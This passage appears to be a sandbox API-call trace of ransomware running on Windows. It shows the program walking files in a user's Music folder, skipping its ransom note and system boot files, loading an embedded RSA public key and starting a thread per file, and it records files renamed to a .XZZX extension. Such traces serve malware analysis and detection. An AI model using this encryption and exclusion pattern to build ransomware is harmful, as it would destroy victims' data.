f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.995] lstrcpyW (in: lpString1=0x17be7c, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0241.995] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0241.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c0 [0241.995] Sleep (dwMilliseconds=0x96) [0242.149] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0242.149] lstrcmpW (lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX", lpString2="..") returned 1 [0242.149] lstrcmpW (lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX", lpString2=".") returned 1 [0242.149] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0242.149] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="ntldr") returned 0x0 [0242.149] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="NTLDR") returned 0x0 [0242.150] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0242.150] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0242.150] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0242.150] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0242.150] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0242.150] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.150] lstrcpyW (in: lpString1=0x17be7c, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0242.150] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c4 [0242.150] Sleep (dwMilliseconds=0x96) [0242.304] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0242.305] lstrcmpW (lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpString2="..") returned 1 [0242.305] lstrcmpW (lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpString2=".") returned 1 [0242.305] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0242.305] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="ntldr") returned 0x0 [0242.305] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="NTLDR") returned 0x0 [0242.305] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0242.305] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0242.305] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0242.305] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0242.305] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0242.305] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.305] lstrcpyW (in: lpString1=0x17be7c, lpString2="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" | out: lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" [0242.305] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c8 [0242.305] Sleep (dwMilliseconds=0x96) [0242.460] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0242.461] lstrcmpW (lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX", lpString2="..") returned 1 [0242.461] lstrcmpW (lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX", lpString2=".") returned 1 [0242.461] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0242.461] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="ntldr") returned 0x0 [0242.461] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="NTLDR") returned 0x0 [0242.461] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0242.461] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0242.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0242.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0242.461] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0242.461] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.461] lstrcpyW (in: lpString1=0x17be7c, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0242.461] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12cc [0242.461] Sleep (dwMilliseconds=0x96) [0242.617] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0242.617] lstrcmpW (lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpString2="..") returned 1 [0242.617] lstrcmpW (lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpString2=".") returned 1 [0242.617] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0242.617] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="ntldr") returned 0x0 [0242.617] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="NTLDR") returned 0x0 [0242.617] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0242.617] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0242.617] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0242.617] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0242.617] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0242.617] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.617] lstrcpyW (in: lpString1=0x17be7c, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0242.617] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12d0 [0242.617] Sleep (dwMilliseconds=0x96) [0242.773] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0242.773] lstrcmpW (lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpString2="..") returned 1 [0242.773] lstrcmpW (lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpString2=".") returned 1 [0242.773] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0242.773] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="ntldr") returned 0x0 [0242.773] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="NTLDR") returned 0x0 [0242.773] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0242.773] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="ntdetect.com") returned 0x0 [0242.773] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0242.773] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0242.773] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0242.773] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.773] lstrcpyW (in: lpString1=0x17be7c, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0242.773] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12d4 [0242.773] Sleep (dwMilliseconds=0x96) [0242.928] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0242.928] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0242.928] lstrcmpW (lpString1="A191878831212978B3B60CE1354E0DC0.XZZX", lpString2="..") returned 1 [0242.928] lstrcmpW (lpString1="A191878831212978B3B60CE1354E0DC0.XZZX", lpString2=".") returned 1 [0242.929] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0242.929] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="ntldr") returned 0x0 [0242.929] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="NTLDR") returned 0x0 [0242.929] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0242.929] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0242.929] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0242.929] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0242.929] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0242.929] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.929] lstrcpyW (in: lpString1=0x17be7c, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0242.929] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12d8 [0242.929] Sleep (dwMilliseconds=0x96) [0243.084] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0243.084] lstrcmpW (lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpString2="..") returned 1 [0243.085] lstrcmpW (lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpString2=".") returned 1 [0243.085] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0243.085] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="ntldr") returned 0x0 [0243.085] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="NTLDR") returned 0x0 [0243.085] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0243.085] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0243.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0243.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0243.085] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0243.085] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.085] lstrcpyW (in: lpString1=0x17be7c, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0243.085] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS 